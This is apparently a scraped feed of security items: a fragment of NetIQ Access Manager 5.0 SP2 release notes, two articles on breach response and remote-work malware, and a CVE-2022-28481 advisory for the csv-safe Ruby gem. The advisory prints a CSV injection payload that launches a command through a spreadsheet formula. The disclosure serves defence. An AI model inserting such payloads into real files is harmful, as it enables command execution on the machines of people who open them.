    

For more information about these APIs, see Identity Server Authentication API.

You can also configure the default user attributes that you want in the authentication response.

For information about configuring the attributes list, see Identity Server Authentication APIs in the NetIQ Access Manager 5.0 Administration Guide.

**1.5 Analytics Dashboard Plug-in Support**

This release introduces Analytics Dashboard plug-in for the following products: NetIQ SecureLogin.

*   NetIQ SecureLogin
    
    For more information, see Analytics Dashboard in the NetIQ SecureLogin 9.0 Administration Guide.
    
*   NetIQ Secure API Manager
    

_NOTE:_The plug-in is not supported with Access Manager container deployment.

**1.8 Support for Integration with Advanced Authentication as a Service**

In addition to the integration with on-premises Advanced Authentication, Access Manager now supports integration with the Advanced Authentication as a Service.

For more information about how to integrate, see Multi-Factor Authentication Using Advanced Authentication.

**1.9 Enhanced UserInfo Endpoint to Decrypt Tokens Encrypted Using Custom Keys**

With this release, when JWT is encrypted using custom keys provided in the resource server, user info endpoint is able to decrypt the JWT and provide valid user info details in response.

**1.10 Updates for Dependent Components**

This release provides the following updated components:

*   Tomcat 9.0.55
    
*   Apache 2.4.53
    
*   Log4j 2.17.1
    
*   JDK 1.8.0\_312
    
*   OpenSSL 1.0.2zd
    

**1.11 Videos**

This release includes the following videos:

*   Access Manager Upgrade Assistant: Registration and Upgrade on RHEL and SLES
    

*   Integrating Access Manager with Itsme

CVE-2022-26326: Access Manager 5.0 Service Pack 2 Release Notes

Breaches can happen to anyone, but a well-oiled machine can internally manage and externally remediate in a way that won't lead to extensive damage to a company's bottom line. (Part 1 of a series.)

Wise security professionals understand that threat actors aren't sitting still, and they aren't playing by the same rules as old-school groups. Lapsus$, for example, is gaining notoriety for its unpredictable behavior, using tactics like extortion and bribing insiders for initial access. It has left even the most experienced security pros scratching their heads.

When you find your organization has been breached, will you be scrambling to figure out your security incident response and remediation plan when your team can't think straight, or will your response be as simple as muscle memory? To minimize the damage done when a security incident occurs, it's important to look inward.

**Keep a Tight Ship  
**I would never dare promise to "eliminate cyber threats," but I can provide strong recommendations to improve internal security. Analyzing some of the latest Lapsus$ victims, we can learn a few things.

First, **_credential security is imperative._** Sooner or later, a threat actor will compromise credentials in your organization. It's not realistic for a business to expect all employees to refuse extortion attempts at all costs. Understanding this reality turns the impossible task into a practical solution.

Security teams should shift their focus from purely _preventing_ credential compromise to _tracking_ user behavior so that anomalies can be quickly identified and acted upon.

Lastly, when discussing the Lapsus$ incidents and others like them that are using extortion and bribery to initiate entry, we must discuss the importance of cybersecurity awareness and insider threat training. Many organizations have put some level of end-user security training into practice. But clearly, that isn't enough to stop novel threat groups from breaching the last line of defense.

**Managing Third-Party Companies  
**Organizations can't prepare their own privacy and security practices in a vacuum — we all depend on a large network of products and services to do our jobs.

Repeat after me: _Anyone (or any organization) could easily be a victim of a third-party incident._

If you were to assess the privileges of each of your third-party solutions, would you be proud of what you found? Chances are, there are weak spots in access protocols. Your third-party solutions likely have access to things they shouldn't. Your contractual agreements probably aren't bulletproof either.

While it's important to factor in the balance of manageable risk with return on investment, it's also essential to foster a collaborative yet vigilant relationship with all of your external parties. It's about defining a clear contract with vendors that involves security early on, focusing on shared responsibilities for security, good architecture, and timely communication.

**Check on Cybersecurity Checklists  
**Creating a cybersecurity checklist should be a requirement to do business with any third party. The checklist should include (but is not limited to): thoroughly vetting vendors' privacy and security standards; adding terms and conditions within your contract to address what would happen in the case of an outage and the costs each party would incur; and contingency plans for employees who may depend on technology or software solutions to do their jobs. Take a similar approach whenever your organization is involved in any type of M&A activity, as the risks apply to those scenarios as well.

There will always be risks associated with third-party solutions, but living in a bubble isn't realistic. Managing this risk by having visibility and security capabilities across the entire security incident response life cycle must be the endgame.

**Communicating Gaps  
**Organizations experiencing a security incident must not hide behind a third party and shouldn't blame their employees. They also must not allow lawyers to create smokescreens around what happened. This helps no one in the long term and only saves face until it doesn't anymore.

Communication around current vulnerabilities and threats is constantly flowing in healthy, well-prepared organizations. As a security practitioner, you should be proactive in how you communicate with leadership. It's extremely effective to manage up by sending a notice to leadership about a new breach or vulnerability with your insight added. Security analysts can offer value by proactively showing that they've already checked "XYZ" and that they're running automated queries for indicators of compromise, etc. They can forward that to their CISO for that person to share upward. CISO/SOC leadership can then take action to fill that gap.

Additionally, when a security incident occurs, security analysts should feel comfortable saying "we didn't have the capabilities to identify this incident." Effective operations require reflection on your own security incidents and thought experiments with other shared problems in the security community. Be honest and document everything. From there, they can use these proof points to work with leadership and fill in the gaps.

**Culture Is Key  
**No one with a straight face can deny the importance of security culture when it comes to keeping a tight ship, managing third-party security, and mastering internal communication. Culture weaves through it all. Motivated employees with excellent support from their team members and leadership are less likely to make errors and are also less likely to turn around and give information to a cybercriminal when faced with the temptation of shiny rewards or, worse, revenge.

Fostering a culture of open communication (as opposed to fear of making a mistake) will help your security analysts feel like they can talk to leadership about what gaps need to be filled to properly do their jobs and minimize the impact of future breaches.

Security incidents will happen to everyone, but a well-oiled machine can internally manage and externally remediate in a way that won't lead to extensive damage to a company's bottom line. Many companies are overwhelmed with just the thought of a breach happening — imagine how they panic when a breach actually occurs.

_Stay tuned for Part 2 later this week, which will provide advice on handling the public's response after an incident._

Security Stuff Happens: What Do You Do When It Hits the Fan?

Aamir Lakhani, global security strategist and researcher at FortiGuard Labs, zeroes in on how adversaries are targeting 'remote everything'.

Aamir Lakhani, global security strategist and researcher at FortiGuard Labs, zeroes in on how adversaries are targeting ‘remote everything’.

The rise of remote work and learning opened new opportunities for many people – as we’ve seen by the number of people who have moved to new places or adapted to “workcations.” Cybercriminals are taking advantage of the same opportunities – just in a different way. Evaluating the prevalence of malware variants by region reveals a sustained interest by cyber adversaries in maximizing the remote work and learning attack vector.

****What Malware Trends are Showing****

Our FortiGuard Labs research team dug into the prevalence of malware variants by region for the second half of 2021. What they found shows a sustained interest by cyber adversaries in maximizing the remote work and learning attack vector. The team found that various forms of browser-based malware were prevalent. Often, this takes the form of phishing lures or scripts that inject code or redirect users to malicious sites.

Detections vary across regions, of course, but can be largely grouped into three broad distribution mechanisms: Microsoft Office executables (MSExcel/, MSOffice/), PDF files and browser scripts (HTML/, JS/). Files packed with the Microsoft Intermediate Language (MSIL) are another common feature.

It’s worthy of note that some kinds of browser-based malware occupy the top spots in all regions. Such techniques have gained prominence recently as a way to exploit peoples’ desire for the latest news about COVID-19, politics, sports or any current headline. And since many are browsing from their home networks these days, there are fewer layers of protection between such malware and would-be victims (e.g., no corporate web filters).

****The Rise of Exploit Kits****

The use of exploit kits (EKs) is one element that has clearly helped cybercriminals in their efforts to execute malware. These kits are automated programs attackers use to exploit systems or applications. What makes an exploit kit very dangerous is its ability to identify victims while they browse the web. After they target a potential victim’s vulnerabilities, attackers can download and execute their malware of choice.

Exploit kits work automatically and silently as they look for vulnerabilities on a user’s machine while they browse the web. Currently, exploit kits are the preferred method for the distribution of remote access tools (RATs) or mass malware by cybercriminals, especially those seeking to profit financially from an exploit.

What’s especially insidious is that EKs don’t require victims to download a file or attachment. The victim need only browse on a compromised website, and then that site pulls in hidden code that attacks vulnerabilities in the user’s browser.

Currently, older kits are available to the public. Attackers have been taking these older kits and modifying them, making them more resilient to newer security detection strategies. Also, many of these kits are being advertised for sale online. Attackers offer these kits for rent on these sites and offer support and update contracts to guarantee they work against future updates.

****Addressing the Remote Everything Security Problem****

As hybrid work and learning become embedded paradigms in our culture, there are fewer layers of protection between malware and would-be victims. And bad actors are gaining access to more tools to help them pull off their nefarious deeds – like exploit kits. At the same time, the attack surface has rapidly expanded and continues to do so.

That means enterprises must take a work-from-anywhere approach to their security. They need to deploy solutions capable of following, enabling and protecting users no matter where they are located. They need security on the endpoint (EDR) combined with zero trust network access (ZTNA) approaches.

Another vital component and best practice of modern security strategy is the development of a holistic security mesh, wherein fully integrated security, services and threat intelligence seamlessly follow users on the road, at home or in the office to provide enterprise-grade protection and productivity across the extended network.

This simplifies and satisfies the demands of today’s three most common WFA scenarios: the corporate office, the home office and the mobile worker. Enterprises must secure mission-critical applications, so securing access to those applications, the networks to connect to those applications, and the devices that run those applications remain a vital component of a layered defense – even when working from a traditional location.

In the home office, risk lurks in the home networks that are often poorly secured with retail wireless routers and contain vulnerable IoT devices, which can be a pathway for hacker to gain access. And mobile workers regularly rely on untrusted and unsecured networks to access critical business resources. This can introduce unique threats, enabling cybercriminals to launch attacks against inadequately protected devices or intercept exposed communications.

A holistic integration of endpoint security, network security and ZTA/ZTNA addresses the challenges that WFA presents.

Criminals will make the most of any possible threat scenario, and the past two years have provided many opportunities for network attack. Malware trends and the rise of exploit kits have proven this point, and it’s now incumbent upon IT security teams to re-evaluate their security posture and adjust as needed. A comprehensive, integrated security mesh that accounts for all work possibilities is a best practice.

**_Aamir Lakhani is cybersecurity researcher and practitioner at FortiGuard Labs_.**

**_Enjoy additional insights from Threatpost’s Infosec Insiders community by visiting our microsite._**

Bad Actors Are Maximizing Remote Everything

CSV-Safe gem < 3.0.0 doesn't filter out special characters which could trigger CSV Injection.

**Older versions of CSV-Safe gem doesn't filter out special characters which could trigger CSV Injection. (< 3.0.0)**

**Vulnerability Type**  
CSV Injection

**Product**  
csv-safe

**Affected Product Code Base**  
CSV-safe - <3.0.0 are effected

**Affected Component**  
Sanitization of CSV Injection vectors.

**Attack Type**  
Remote

**Attack Vector**  
**%0A-3+3+cmd|' /C calc'!D2** could be used to bypass CSV injection sanitizations in older versions.

**Discoverers**  
Danish Tariq

**Fixed by**  
Gabriel Rios - #8

**References**  
https://github.com/zvory/csv-safe  
#8  
https://hackerone.com/reports/223999  
WeblateOrg/weblate@d9e136f  
https://bugzilla.mozilla.org/show\_bug.cgi?id=1259881

CVE-2022-28481: Older versions of CSV-Safe gem doesn't filter out special characters which could trigger CSV Injection. (< 3.0.0)  · Issue #7 · zvory/csv-safe

Tag

#ios